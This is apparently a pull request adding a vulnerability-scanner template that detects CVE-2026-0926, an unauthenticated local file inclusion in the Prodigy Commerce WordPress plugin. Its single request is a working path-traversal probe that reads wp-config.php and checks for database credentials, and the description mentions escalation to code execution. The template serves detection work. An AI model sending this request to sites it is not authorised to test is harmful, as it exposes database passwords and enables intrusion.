### PR TITLE
Add CVE-2026-0926: WordPress Prodigy Commerce Unauthenticated LFI

### DIFF
--- a/http/cves/2026/CVE-2026-0926.yaml
+++ b/http/cves/2026/CVE-2026-0926.yaml
@@ -1,0 +1,45 @@
+id: CVE-2026-0926
+
+info:
+  name: WordPress Prodigy Commerce <= 3.2.9 - Unauthenticated Local File Inclusion
+  author: optimus-fulcria
+  severity: high
+  description: |
+    The Prodigy Commerce plugin for WordPress versions up to and including 3.2.9 is vulnerable to Local File Inclusion via the template_name parameter. Unauthenticated attackers can supply crafted path traversal sequences to include and read arbitrary files from the local filesystem, including sensitive configuration files such as wp-config.php containing database credentials and authentication salts.
+  impact: |
+    Unauthenticated attackers can read sensitive files including wp-config.php, potentially leading to full database compromise and remote code execution via log poisoning or other LFI-to-RCE escalation techniques.
+  remediation: |
+    Update the Prodigy Commerce plugin to version 3.3.0 or later.
+  reference:
+    - https://wp-firewall.com/critical-local-file-inclusion-in-prodigy-commerce-published-on-2026-02-19-cve-2026-0926
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-0926
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 8.1
+    cve-id: CVE-2026-0926
+    cwe-id: CWE-98
+  metadata:
+    verified: false
+    max-request: 1
+    vendor: developer
+    product: prodigy-commerce
+    framework: wordpress
+  tags: cve,cve2026,wordpress,wp-plugin,prodigy-commerce,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?template_name=../../../wp-config.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## Summary
- Adds detection template for CVE-2026-0926 (CVSS 8.1) - unauthenticated LFI in Prodigy Commerce WordPress plugin <= 3.2.9
- Path traversal via template_name parameter enables reading wp-config.php
- Template verifies LFI by checking for DB credential markers in response

## References
- https://wp-firewall.com/critical-local-file-inclusion-in-prodigy-commerce-published-on-2026-02-19-cve-2026-0926
- https://nvd.nist.gov/vuln/detail/CVE-2026-0926